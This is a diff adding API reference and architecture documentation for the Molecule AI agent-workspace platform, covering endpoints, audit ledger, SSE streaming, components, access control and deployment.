+| `event_type` | string | `delegation`, `decision`, `gate`, or `hitl` |
+| `actor` | string | Workspace ID that generated the event |
+| `summary` | string | Human-readable event description |
+| `chain_valid` | bool | `false` if the entry's hash does not match the prior chain — indicates possible tampering |
+| `created_at` | string (ISO 8601) | Event timestamp |
+| `cursor` | string \| null | Opaque pagination cursor; `null` when there are no more entries |
+
+Example response:
+
+```json
+{
+  "entries": [
+    {
+      "id": "aud_xyz789",
+      "event_type": "delegation",
+      "actor": "ws_abc123",
+      "summary": "Delegated task 'fix CI' to Backend Engineer",
+      "chain_valid": true,
+      "created_at": "2026-04-17T14:05:00Z"
+    }
+  ],
+  "cursor": "eyJpZCI6ImF1ZF94eXo3ODkifQ"
+}
+```
+
+### Session Search
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/session-search` | WorkspaceAuth | Search activity logs with filters for type, date range, and text content. Returns paginated results. |
+
+---
+
+## Workflow Checkpoints
+
+Step-level progress persistence for long-running Temporal workflows. Workspaces with `runtime: langgraph` (Temporal) automatically save a checkpoint after each of the three workflow stages (`task_receive`, `llm_call`, `task_complete`) and resume from the last completed stage on restart.
+
+<Callout type="info">
+  **Automatic resume behavior (runtime: langgraph only)**
+
+  When a Temporal workspace restarts mid-workflow, the runtime reads the highest-index checkpoint and sets `resume_from_step` accordingly. Already-completed stages are skipped — the agent picks up exactly where it left off without re-running earlier steps.
+
+  Checkpoint I/O is non-fatal: network errors are silently swallowed. A crashed or unreachable platform never prevents the agent from running.
+</Callout>
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces/:id/checkpoints` | WorkspaceAuth | Upsert a step checkpoint. Body: `{ "workflow_id": "...", "step_name": "task_receive\|llm_call\|task_complete", "step_index": 0, "payload": {...} }`. Uses `ON CONFLICT DO UPDATE` — safe to call multiple times. |
+| GET | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Return all checkpoints for a workflow, ordered by `step_index DESC`. Returns 404 if no checkpoints exist for the workflow. |
+| DELETE | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Clear all checkpoints for a workflow. Called by the runtime on clean task completion. Returns 404 if none exist. |
+
+**Step names and indices:**
+
+| Step | `step_index` | Meaning |
+|------|-------------|---------|
+| `task_receive` | 0 | Task received from A2A message |
+| `llm_call` | 1 | LLM inference completed |
+| `task_complete` | 2 | Task result sent back to caller |
+
+---
+
+## Schedules
+
+Cron-based scheduled tasks per workspace.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/schedules` | WorkspaceAuth | List all schedules for a workspace. |
+| POST | `/workspaces/:id/schedules` | WorkspaceAuth | Create a schedule. Body: `{ "expression": "0 */6 * * *", "timezone": "UTC", "prompt": "...", "enabled": true }`. |
+| PATCH | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Update a schedule (expression, timezone, prompt, enabled). |
+| DELETE | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Delete a schedule. |
+| POST | `/workspaces/:id/schedules/:scheduleId/run` | WorkspaceAuth | Manually trigger a schedule immediately. |
+| GET | `/workspaces/:id/schedules/:scheduleId/history` | WorkspaceAuth | List past runs for a schedule. Includes status (`success`, `error`, `skipped`) and `error_detail`. |
+
+Schedule `source` field: `template` for org/import-seeded schedules, `runtime` for Canvas/API-created. The `last_status` includes `skipped` when the scheduler concurrency-aware-skips a busy workspace.
+
+---
+
+## Channels
+
+Social channel integrations (Telegram, Slack, etc.) for workspace agents.
+
+### Per-Workspace Channels
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/channels` | WorkspaceAuth | List channels for a workspace. |
+| POST | `/workspaces/:id/channels` | WorkspaceAuth | Create a channel. Body includes platform type, JSONB config, and allowlist. |
+| PATCH | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Update a channel's config or allowlist. |
+| DELETE | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Delete a channel. |
+| POST | `/workspaces/:id/channels/:channelId/send` | WorkspaceAuth | Send an outbound message through the channel. |
+| POST | `/workspaces/:id/channels/:channelId/test` | WorkspaceAuth | Test the channel connection (send a test message). |
+
+### Global Channel Endpoints
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/channels/adapters` | None | List available social platform adapters (Telegram, Slack, etc.). |
+| POST | `/channels/discover` | AdminAuth | Auto-detect available chats/groups for a bot token. |
+| POST | `/webhooks/:type` | None | Incoming webhook endpoint for social platforms. The `:type` parameter identifies the platform (e.g., `telegram`, `slack`). |
+
+---
+
+## Plugins
+
+Plugin registry and per-workspace plugin management.
+
+### Global Plugin Registry
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/plugins` | None | List all plugins in the registry. Supports `?runtime=` filter to show only compatible plugins. |
+| GET | `/plugins/sources` | None | List registered install-source schemes (e.g., `github://`, `local://`). |
+
+### Per-Workspace Plugins
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/plugins` | WorkspaceAuth | List installed plugins for a workspace. |
+| POST | `/workspaces/:id/plugins` | WorkspaceAuth | Install a plugin. Body: `{ "source": "github://org/repo" }`. Safeguards: 64 KiB body limit, 5 min fetch timeout, 100 MiB max staged-tree. |
+| DELETE | `/workspaces/:id/plugins/:name` | WorkspaceAuth | Uninstall a plugin by name. |
+| GET | `/workspaces/:id/plugins/available` | WorkspaceAuth | List plugins available for this workspace (filtered by workspace runtime). |
+| GET | `/workspaces/:id/plugins/compatibility` | WorkspaceAuth | Preflight runtime-change check. Query: `?runtime=X`. Returns which currently-installed plugins would be incompatible with the target runtime. |
+
+---
+
+## Auth Tokens
+
+Bearer token management for workspaces.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/tokens` | WorkspaceAuth | List active tokens for a workspace (token values are masked). |
+| POST | `/workspaces/:id/tokens` | WorkspaceAuth | Create a new bearer token for the workspace. |
+| DELETE | `/workspaces/:id/tokens/:tokenId` | WorkspaceAuth | Revoke a specific token. |
+
+### Test Token (Development Only)
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/admin/workspaces/:id/test-token` | None | Mint a fresh bearer token for E2E scripts. Returns 404 unless `MOLECULE_ENV != production` or `MOLECULE_ENABLE_TEST_TOKENS=1`. |
+
+---
+
+## Teams
+
+Expand and collapse team views in the Canvas hierarchy.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces/:id/expand` | WorkspaceAuth | Expand a team workspace to show its children on the canvas. |
+| POST | `/workspaces/:id/collapse` | WorkspaceAuth | Collapse a team workspace to hide its children. |
+
+---
+
+## Templates and Bundles
+
+### Templates
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/templates` | AdminAuth | List available workspace templates with their runtime, description, and config schema. |
+| POST | `/templates/import` | AdminAuth | Import a workspace template from a `github://` source URL. |
+
+### Org Templates
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/org/templates` | AdminAuth | List available organization templates. |
+| POST | `/org/import` | AdminAuth | Import an org template. Applies `resolveInsideRoot` path sanitization. Creates the full workspace hierarchy defined in `org.yaml`. |
+
+### Bundles
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/bundles/export/:id` | AdminAuth | Export a workspace (or workspace tree) as a portable bundle. Includes config, secrets (keys only), memory, schedules, and hierarchy. |
+| POST | `/bundles/import` | AdminAuth | Import a previously-exported bundle. Recreates the workspace tree with all associated data. |
+
+---
+
+## Approvals
+
+Human-in-the-loop approval system for agent actions.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces/:id/approvals` | WorkspaceAuth | Create an approval request. Body includes the action description, metadata, and options. |
+| GET | `/workspaces/:id/approvals` | WorkspaceAuth | List approval requests for a workspace. |
+| POST | `/workspaces/:id/approvals/:id/decide` | WorkspaceAuth | Approve or reject an approval request. Body: `{ "decision": "approve" }` or `{ "decision": "reject" }`. |
+| GET | `/approvals/pending` | AdminAuth | List all pending approval requests across all workspaces. |
+
+---
+
+## Canvas
+
+Canvas viewport persistence (cosmetic only).
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/canvas/viewport` | None | Get the saved canvas viewport (zoom, pan position). Open endpoint for bootstrap-friendliness. |
+| PUT | `/canvas/viewport` | CanvasOrBearer | Save the canvas viewport. Accepts bearer OR matching `Origin` header. Worst case on forgery: viewport corruption, recovered by page refresh. |
+
+---
+
+## Traces
+
+LLM trace retrieval from Langfuse.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/traces` | WorkspaceAuth | List LLM traces for a workspace from Langfuse. |
+
+---
+
+## Audit Ledger
+
+HMAC-SHA256-chained immutable agent event log for compliance record-keeping (EU AI Act Art. 12 / Art. 13). Each event is cryptographically chained to the previous one — tampering with any record breaks all subsequent HMACs.
+
+<Callout type="warn">
+  **`AUDIT_LEDGER_SALT` required.** The platform and workspace containers must share the same `AUDIT_LEDGER_SALT` environment variable to compute and verify event HMACs. Set it in both your platform env and workspace container env. If the variable is absent, `chain_valid` returns `null` (not `false`) — no records are lost, verification is simply unavailable.
+</Callout>
+
+### Query
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/audit` | WorkspaceAuth | Query the audit ledger for a workspace. Returns events in descending chronological order with inline chain verification. |
+
+**Query parameters:**
+
+| Parameter | Type | Description |
+|-----------|------|-------------|
+| `agent_id` | string | Filter to a specific agent. |
+| `session_id` | string | Filter to a specific session. |
+| `from` | RFC 3339 | Start of time range (e.g. `2026-04-01T00:00:00Z`). |
+| `to` | RFC 3339 | End of time range. |
+| `limit` | int | Max records to return. Capped at **500**. |
+| `offset` | int | Pagination offset. |
+
+**Response shape:**
+
+```json
+{
+  "events": [
+    {
+      "id": "uuid",
+      "workspace_id": "uuid",
+      "agent_id": "my-researcher",
+      "session_id": "sess_abc123",
+      "event_type": "tool_call",
+      "payload": { "tool": "bash", "input": "ls /workspace" },
+      "hmac": "sha256hex...",
+      "prev_hmac": "sha256hex...",
+      "created_at": "2026-04-17T12:00:00Z"
+    }
+  ],
+  "chain_valid": true
+}
+```
+
+`chain_valid` values:
+- `true` — all HMACs verified; ledger is intact.
+- `false` — at least one HMAC mismatch; possible tampering.
+- `null` — `AUDIT_LEDGER_SALT` is absent from the platform env; verification skipped.
+
+### Workspace-side: recording events
+
+In your workspace template, wire `LedgerHooks` into the agent pipeline:
+
+```python
+from molecule_audit.hooks import LedgerHooks
+
+hooks = LedgerHooks(agent_id="my-researcher", session_id=session_id)
+
+async with hooks:
+    # hooks.on_task_start / on_llm_call / on_tool_call / on_task_end
+    # fire automatically at each pipeline stage
+    result = await agent.run(task)
+```
+
+`LedgerHooks` is exception-safe — a failed ledger write never aborts the agent task.
+
+### CLI chain verification
+
+```bash
+# Verify the full chain for an agent; exit 0 = intact
+python -m molecule_audit.verify --agent-id my-researcher
+
+# Custom DB URL
+python -m molecule_audit.verify --agent-id my-researcher --db postgresql://user:pass@host/db
+```
+
+Exit codes: `0` = chain valid · `1` = broken chain · `2` = `AUDIT_LEDGER_SALT` missing · `3` = DB error.
+
+---
+
+## Events
+
+Append-only event log for structure changes.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/events` | AdminAuth | List all structure events across all workspaces. |
+| GET | `/events/:workspaceId` | AdminAuth | List structure events for a specific workspace. |
+
+---
+
+## Terminal
+
+WebSocket-based terminal access to workspace containers.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| WS | `/workspaces/:id/terminal` | WorkspaceAuth | Open a WebSocket terminal session to the workspace container. Provides interactive shell access. |
+
+---
+
+## WebSocket
+
+Real-time event streaming for Canvas clients.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| WS | `/ws` | None | Connect to the WebSocket hub. Receives all structure events (`WORKSPACE_ONLINE`, `WORKSPACE_OFFLINE`, `HEARTBEAT`, `CONFIG_UPDATED`, `A2A_RESPONSE`, `AGENT_MESSAGE`, etc.). Canvas clients connect here for real-time updates. |
+
+---
+
+## Server-Sent Events (AG-UI)
+
+Per-workspace SSE stream compatible with the [AG-UI protocol](https://github.com/ag-ui-protocol/ag-ui). Use this endpoint to consume structured agent events from a web client or external tool without a WebSocket library.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/events/stream` | WorkspaceAuth | Open an SSE stream for the workspace. Returns `Content-Type: text/event-stream`. Sends an initial `: ping` comment on connect, then delivers every event emitted by the workspace in AG-UI envelope format. Events from other workspaces are filtered out. Returns `404` if the workspace does not exist. |
+
+### Event envelope format
+
+Each event is delivered as an SSE `data:` line containing a JSON object:
+
+```json
+{
+  "type": "AGENT_MESSAGE",
+  "timestamp": 1713398400000,
+  "data": { ... }
+}
+```
+
+- **`type`** — event type string (e.g. `AGENT_MESSAGE`, `A2A_RESPONSE`, `TASK_UPDATED`)
+- **`timestamp`** — Unix milliseconds at time of broadcast
+- **`data`** — event-specific payload (same payload as the WebSocket hub delivers)
+
+### Event types streamed
+
+All event types emitted by `RecordAndBroadcast` **and** `BroadcastOnly` reach the SSE stream. The `BroadcastOnly` path is important: events like `AGENT_MESSAGE`, `A2A_RESPONSE`, and `TASK_UPDATED` skip Redis and would be invisible to a Redis-only subscriber — the in-process SSE layer catches them.
+
+### Example: connect with `curl`
+
+```bash
+curl -N \
+  -H "Authorization: Bearer <workspace-token>" \
+  http://localhost:8080/workspaces/<id>/events/stream
+```
+
+```
+: ping
+
+data: {"type":"AGENT_MESSAGE","timestamp":1713398401234,"data":{"text":"Starting task..."}}
+
+data: {"type":"TASK_UPDATED","timestamp":1713398405678,"data":{"status":"running"}}
+```
+
+### Example: connect from JavaScript
+
+```js
+const es = new EventSource(
+  `/workspaces/${workspaceId}/events/stream`,
+  { headers: { Authorization: `Bearer ${token}` } }
+);
+
+es.onmessage = (e) => {
+  const event = JSON.parse(e.data);
+  console.log(event.type, event.data);
+};
+```
+
+<Callout type="info">
+  The SSE endpoint uses WorkspaceAuth — the bearer token must be bound to the `:id` in the path. A token for workspace A cannot open a stream for workspace B.
+</Callout>
+
+---
+
+## Error Responses
+
+All endpoints return standard HTTP status codes:
+
+| Status | Meaning |
+|--------|---------|
+| 200 | Success |
+| 201 | Created |
+| 400 | Bad request (malformed body, missing required fields) |
+| 401 | Unauthorized (missing or invalid bearer token) |
+| 403 | Forbidden (valid token but insufficient access) |
+| 404 | Not found (workspace, schedule, channel, etc. does not exist) |
+| 409 | Conflict (idempotency key collision on delegation) |
+| 429 | Rate limited (exceeds `RATE_LIMIT` requests/min) |
+| 500 | Internal server error |
+
+Error response body format:
+
+```json
+{
+  "error": "human-readable error message"
+}
+```
+
+---
+
+## Rate Limiting
+
+All endpoints are subject to a global rate limit of `RATE_LIMIT` requests per minute (default: 600). When exceeded, the platform returns `429 Too Many Requests` with a `Retry-After` header.
+
+---
+
+## CORS
+
+The platform sets CORS headers based on the `CORS_ORIGINS` environment variable (comma-separated list, default: `http://localhost:3000,http://localhost:3001`). Preflight (`OPTIONS`) requests are handled automatically by the Gin CORS middleware.
--- a/content/docs/architecture.mdx
+++ b/content/docs/architecture.mdx
@ -0,0 +1,361 @@
+---
+title: Architecture
+description: System architecture, components, infrastructure, and communication model for the Molecule AI platform.
+---
+
+# Architecture
+
+Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A (Agent-to-Agent) protocol, and are visualized on a drag-and-drop canvas.
+
+## System Overview
+
+```
+Canvas (Next.js :3000) <--WebSocket--> Platform (Go :8080) <--HTTP--> Postgres + Redis
+                                                                        |
+                                        Workspace A <----A2A----> Workspace B
+                                        (Python agents)
+                                              | register/heartbeat |
+                                              +------ Platform ----+
+```
+
+The Canvas provides the visual interface, the Platform acts as the control plane, and Workspaces are isolated containers running AI agent runtimes. All inter-agent communication is mediated by the Platform via the A2A proxy, which enforces hierarchical access control.
+
+---
+
+## Four Main Components
+
+### Canvas
+
+**Stack:** Next.js 15 + React Flow (@xyflow/react v12) + Zustand + Tailwind CSS
+
+The Canvas is the browser-based visual workspace graph. It provides:
+
+- **Drag-and-drop layout** with persistent node positions (saved via `PATCH /workspaces/:id`)
+- **Team nesting** using recursive `TeamMemberChip` components (up to 3 levels deep)
+- **Real-time status** via WebSocket connection to the Platform
+- **Chat interface** with two sub-tabs: "My Chat" (user-to-agent) and "Agent Comms" (agent-to-agent A2A traffic)
+- **Config editor** with "Save & Restart" and "Save" (deferred restart) modes
+- **Secrets management** with auto-restart on POST/DELETE
+
+**State management:**
+
+| Concern | Mechanism |
+|---------|-----------|
+| Initial load | HTTP fetch `GET /workspaces` into Zustand |
+| Real-time updates | WebSocket events via `applyEvent()` |
+| Position persistence | `onNodeDragStop` sends `PATCH /workspaces/:id` with `{x, y}` |
+| Node nesting | `nestNode` sets `hidden: !!targetId`; children render inside parent |
+
+**Environment variables:**
+
+| Variable | Default | Purpose |
+|----------|---------|---------|
+| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API base URL |
+| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
+
+### Platform
+
+**Stack:** Go / Gin
+
+The Platform is the central control plane responsible for:
+
+- **Workspace CRUD** -- create, read, update, delete workspaces
+- **Registry** -- workspace registration, heartbeat tracking, agent card management
+- **Discovery** -- peer lookup, access control checks
+- **WebSocket hub** -- real-time event broadcasting to Canvas clients
+- **Liveness monitoring** -- three-layer container health detection
+- **A2A proxy** -- routes inter-agent messages with hierarchical access control
+- **Docker provisioner** -- container lifecycle management with tier-based resource limits
+- **Scheduler** -- cron-based scheduled tasks per workspace
+- **Channel adapters** -- social integrations (Telegram, Slack, etc.)
+
+**Key environment variables:**
+
+| Variable | Default | Purpose |
+|----------|---------|---------|
+| `DATABASE_URL` | (required) | Postgres connection string |
+| `REDIS_URL` | (required) | Redis connection string |
+| `PORT` | `8080` | Server listen port |
+| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers |
+| `SECRETS_ENCRYPTION_KEY` | (optional) | AES-256 key, 32 bytes |
+| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Allowed CORS origins |
+| `RATE_LIMIT` | `600` | Requests per minute |
+| `MOLECULE_ENV` | (optional) | Set `production` to hide test endpoints |
+| `MOLECULE_ORG_ID` | (optional) | SaaS tenant org gating |
+| `WORKSPACE_DIR` | (optional) | Global fallback host path for `/workspace` bind-mount |
+| `AWARENESS_URL` | (optional) | Injected into workspace containers for cross-session memory |
+| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are kept |
+| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | Cleanup sweep interval |
+
+**Workspace tier resource limits:**
+
+| Tier | Env (Memory) | Env (CPU) | Defaults |
+|------|-------------|-----------|----------|
+| Standard (Tier 2) | `TIER2_MEMORY_MB` | `TIER2_CPU_SHARES` | 512 MB / 1 CPU |
+| Privileged (Tier 3) | `TIER3_MEMORY_MB` | `TIER3_CPU_SHARES` | 2048 MB / 2 CPU |
+| Full-host (Tier 4) | `TIER4_MEMORY_MB` | `TIER4_CPU_SHARES` | 4096 MB / 4 CPU |
+
+### Workspace Runtime
+
+**Published as:** [`molecule-ai-workspace-runtime`](https://pypi.org/project/molecule-ai-workspace-runtime/) on PyPI
+
+The shared runtime provides the base agent infrastructure: A2A server, heartbeat loop, config loading, platform auth, plugin system, and built-in tools. Each AI framework adapter lives in its own standalone repository.
+
+| Runtime | Standalone Repo | Key Dependencies |
+|---------|-----------------|------------------|
+| LangGraph | `molecule-ai-workspace-template-langgraph` | langchain-anthropic, langgraph |
+| Claude Code | `molecule-ai-workspace-template-claude-code` | claude-agent-sdk, @anthropic-ai/claude-code |
+| OpenClaw | `molecule-ai-workspace-template-openclaw` | openclaw (npm) |
+| CrewAI | `molecule-ai-workspace-template-crewai` | crewai |
+| AutoGen | `molecule-ai-workspace-template-autogen` | autogen |
+| DeepAgents | `molecule-ai-workspace-template-deepagents` | deepagents |
+| Hermes | `molecule-ai-workspace-template-hermes` | openai, anthropic, google-genai |
+| Gemini CLI | `molecule-ai-workspace-template-gemini-cli` | @google/gemini-cli (npm) |
+| [Google ADK](/docs/google-adk) | `molecule-ai-workspace-template-google-adk` | google-adk>=1.0.0 |
+
+Each adapter repo has its own `Dockerfile` that installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies. Templates are cloned at Docker build time into the platform image via `manifest.json`.
+
+### Framework Adapters (workspace-template)
+
+Some workspace templates embed framework-specific adapters that extend `molecule-ai-workspace-runtime` with framework-level security controls. The **smolagents adapter** (`workspace-template/adapters/smolagents/`) ships two such controls:
+
+**Environment sanitization** (`make_safe_env`) — child processes spawned by the smolagents adapter inherit a filtered copy of the host environment. The following are stripped before the subprocess starts:
+
+- Any key listed in `SMOLAGENTS_ENV_DENYLIST` (comma-separated; set by the operator)
+- Any key whose name ends in `_API_KEY` or `_TOKEN`
+
+Set `SMOLAGENTS_ENV_DENYLIST=VAR1,VAR2` in the workspace's secrets to extend the denylist.
+
+**Safe message delivery** (`safe_send_message`) — outbound smolagents messages are:
+
+1. Prefixed with `[smolagents]` so the source is always attributable in logs and Canvas activity
+2. Truncated at 2 000 characters to prevent oversized payloads
+3. HTML-entity-escaped to block social-engineering injections embedded in agent output
+
+These controls complement the platform-level secret redaction described in the [API Reference](/docs/api-reference#agent-memories-hma-scoped).
+
+### molecli
+
+**Stack:** Go / Bubbletea + Lipgloss
+
+A terminal UI dashboard for real-time workspace monitoring, event log streaming, health overview, and delete/filter operations. Reads `MOLECLI_URL` (default `http://localhost:8080`) to locate the platform. Now published as a standalone repo at `github.com/Molecule-AI/molecule-cli`.
+
+---
+
+## Infrastructure Services
+
+All services run via `docker-compose.infra.yml`, attached to the shared `molecule-monorepo-net` network. Start them with:
+
+```bash
+./infra/scripts/setup.sh    # Start Postgres, Redis, Langfuse, Temporal; run migrations
+```
+
+### Postgres (port 5432)
+
+Primary datastore for workspaces, events, activity logs, secrets, schedules, channels, and more. Also backs Langfuse and Temporal via separate databases.
+
+Key tables:
+
+| Table | Purpose |
+|-------|---------|
+| `workspaces` | Core entity -- status, runtime, agent_card, heartbeat, current_task |
+| `canvas_layouts` | Persisted x/y positions |
+| `structure_events` | Append-only event log |
+| `activity_logs` | A2A communications, task updates, agent logs, errors |
+| `workspace_schedules` | Cron tasks with expression, timezone, prompt, run history |
+| `workspace_channels` | Social channel integrations with JSONB config |
+| `workspace_secrets` / `global_secrets` | Encrypted secrets storage |
+| `workspace_auth_tokens` | Bearer tokens (auto-revoked on workspace delete) |
+| `agent_memories` | HMA-scoped agent memory |
+| `approvals` | Human-in-the-loop approval requests |
+
+**Migration runner:** On startup, the platform globs `*.sql` in the migrations directory, filters out `.down.sql` files, sorts alphabetically, and executes each. All `.up.sql` files must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`).
+
+**JSONB gotcha:** When inserting Go `[]byte` (from `json.Marshal`) into Postgres JSONB columns, you must convert to `string()` first and use `::jsonb` cast in SQL. The `lib/pq` driver treats `[]byte` as `bytea`, not JSONB.
+
+### Redis (port 6379)
+
+Used for pub/sub event broadcasting and heartbeat TTL tracking. Workspace heartbeat keys expire after 60 seconds -- expiry triggers the liveness monitor.
+
+### Langfuse (port 3001)
+
+LLM trace viewer backed by ClickHouse. Provides observability into agent LLM calls, token usage, and latency.
+
+### Temporal (port 7233 gRPC, port 8233 Web UI)
+
+Durable workflow engine for `workspace-template/builtin_tools/temporal_workflow.py`. Dev-only posture: the auto-setup image runs with no auth on `0.0.0.0:7233`. Production deployments must gate access via mTLS or an API key / reverse proxy.
+
+---
+
+## Communication Model
+
+### WebSocket Events Flow
+
+```
+1. Action occurs (register, heartbeat, config change, etc.)
+2. broadcaster.RecordAndBroadcast()
+   -> inserts into structure_events table
+   -> publishes to Redis pub/sub
+3. Redis subscriber relays to WebSocket hub
+4. Hub broadcasts to:
+   - Canvas clients (all events)
+   - Workspace clients (filtered by CanCommunicate)
+```
+
+### A2A Proxy
+
+The A2A proxy (`POST /workspaces/:id/a2a`) routes agent-to-agent messages. The caller identifies itself via the `X-Workspace-ID` header and authenticates with `Authorization: Bearer <token>`.
+
+### Access Control Rules
+
+Determined by `CanCommunicate(callerID, targetID)` in `registry/access.go`:
+
+| Relationship | Allowed |
+|-------------|---------|
+| Same workspace (self-call) | Yes |
+| Siblings (same `parent_id`) | Yes |
+| Root-level siblings (both `parent_id` IS NULL) | Yes |
+| Parent to child / child to parent | Yes |
+| System callers (`webhook:*`, `system:*`, `test:*`) | Yes (bypass) |
+| Canvas requests (no `X-Workspace-ID`) | Yes (bypass) |
+| Everything else | **Denied** |
+
+### Import Cycle Prevention
+
+The platform uses function injection to avoid Go import cycles between `ws`, `registry`, and `events` packages:
+
+- `ws.NewHub(canCommunicate AccessChecker)` -- Hub accepts `registry.CanCommunicate` as a function
+- `registry.StartLivenessMonitor(ctx, onOffline OfflineHandler)` -- Liveness accepts broadcaster callback
+- `registry.StartHealthSweep(ctx, checker ContainerChecker, interval, onOffline)` -- Health sweep accepts Docker checker interface
+- Wiring happens in `platform/cmd/server/main.go` -- init order: `wh -> onWorkspaceOffline -> liveness/healthSweep -> router`
+
+---
+
+## Container Health Detection
+
+Three independent layers detect dead containers (e.g., Docker Desktop crash):
+
+### Layer 1: Passive (Redis TTL)
+
+Each workspace sends heartbeats that set a Redis key with a 60-second TTL. When the key expires, the liveness monitor detects the workspace as offline and triggers an auto-restart.
+
+### Layer 2: Proactive (Health Sweep)
+
+`registry.StartHealthSweep` polls the Docker API every 15 seconds. Catches dead containers faster than waiting for Redis TTL expiry.
+
+### Layer 3: Reactive (A2A Proxy)
+
+When the A2A proxy encounters a connection error to a workspace, it immediately checks `provisioner.IsRunning()`. If the container is dead, it marks the workspace offline and triggers a restart.
+
+All three layers call `onWorkspaceOffline`, which broadcasts `WORKSPACE_OFFLINE` and initiates `wh.RestartByID()`. Redis cleanup uses the shared `db.ClearWorkspaceKeys()` function.
+
+---
+
+## Workspace Lifecycle
+
+```
+provisioning --> online (on register)
+     ^              |
+     |         degraded (error_rate > 0.5)
+     |              |
+     |           online (recovered)
+     |              |
+     |          offline (Redis TTL expired / health sweep)
+     |              |
+     +--- auto-restart ---+
+                    |
+                 removed (deleted)
+
+Any state --> paused (user pauses) --> provisioning (user resumes)
+```
+
+Paused workspaces skip health sweep, liveness monitor, and auto-restart.
+
+**Restart context:** After any restart and successful re-registration, the platform sends a synthetic A2A `message/send` with `metadata.kind=restart_context` containing the restart timestamp, previous session info, and available env-var keys (keys only, never values). The sender uses the `system:restart-context` caller prefix to bypass `CanCommunicate`. If the workspace does not re-register within 30 seconds, the message is dropped.
+
+**Initial prompt:** Agents can auto-execute a prompt on startup before any user interaction. Configure via `initial_prompt` (inline string) or `initial_prompt_file` (path relative to config dir) in `config.yaml`. A `.initial_prompt_done` marker file prevents re-execution on restart.
+
+**Idle loop:** When `idle_prompt` is non-empty in `config.yaml`, the workspace self-sends it every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The idle check is local (no LLM call) and the prompt only fires when the agent is genuinely idle.
+
+---
+
+## Deployment Modes
+
+### Self-Hosted
+
+Run the full stack on your own infrastructure using Docker Compose:
+
+```bash
+# Infrastructure only (Postgres, Redis, Langfuse, Temporal)
+docker compose -f docker-compose.infra.yml up -d
+
+# Full stack
+docker compose up
+```
+
+### SaaS
+
+Hosted at `moleculesai.app` with per-tenant isolation. Each tenant gets a dedicated Fly Machine running the tenant image. The `MOLECULE_ORG_ID` env var gates API access -- every non-allowlisted request must carry a matching `X-Molecule-Org-Id` header or gets a 404. When unset, the guard is a passthrough so self-hosted and dev environments are unaffected.
+
+### Tenant Image
+
+`platform/Dockerfile.tenant` bundles the Go platform + Canvas frontend + templates into a single container image, published to `ghcr.io/molecule-ai/platform:latest` and `:sha-<short>`.
+
+---
+
+## Subdomain Architecture
+
+| Subdomain | Service | Purpose |
+|-----------|---------|---------|
+| `moleculesai.app` | Landing page | Marketing site |
+| `app.moleculesai.app` | SaaS dashboard | Tenant management UI |
+| `api.moleculesai.app` | Control plane API | Platform REST + WebSocket |
+| `doc.moleculesai.app` | Documentation | This documentation site |
+| `status.moleculesai.app` | Status page | Uptime and incident tracking |
+| `*.moleculesai.app` | Tenant instances | Per-org isolated platform instances |
+
+---
+
+## Plugin System
+
+Plugins extend workspace capabilities. Two categories exist:
+
+**Shared plugins** (auto-loaded by every workspace):
+
+- **molecule-dev** -- codebase conventions + review-loop skill
+- **superpowers** -- verification, TDD, systematic debugging, writing plans
+- **ecc** -- general Claude Code guardrails
+- **browser-automation** -- Puppeteer/CDP web scraping and live canvas screenshots
+
+**Modular guardrails** (opt-in per workspace):
+
+- **Hook plugins** (ambient enforcement): `molecule-careful-bash`, `molecule-freeze-scope`, `molecule-audit-trail`, `molecule-session-context`, `molecule-prompt-watchdog`
+- **Skill plugins** (on-demand): `molecule-skill-code-review`, `molecule-skill-cross-vendor-review`, `molecule-skill-llm-judge`, `molecule-skill-update-docs`, `molecule-skill-cron-learnings`
+- **Workflow plugins** (slash commands): `molecule-workflow-triage`, `molecule-workflow-retro`
+
+**Org-template plugin resolution:** Per-workspace `plugins:` lists in org template `org.yaml` role overrides UNION with `defaults.plugins` (deduplicated, defaults first). To opt a specific default out for a given role, prefix the plugin name with `!` or `-` (e.g. `!browser-automation`).
+
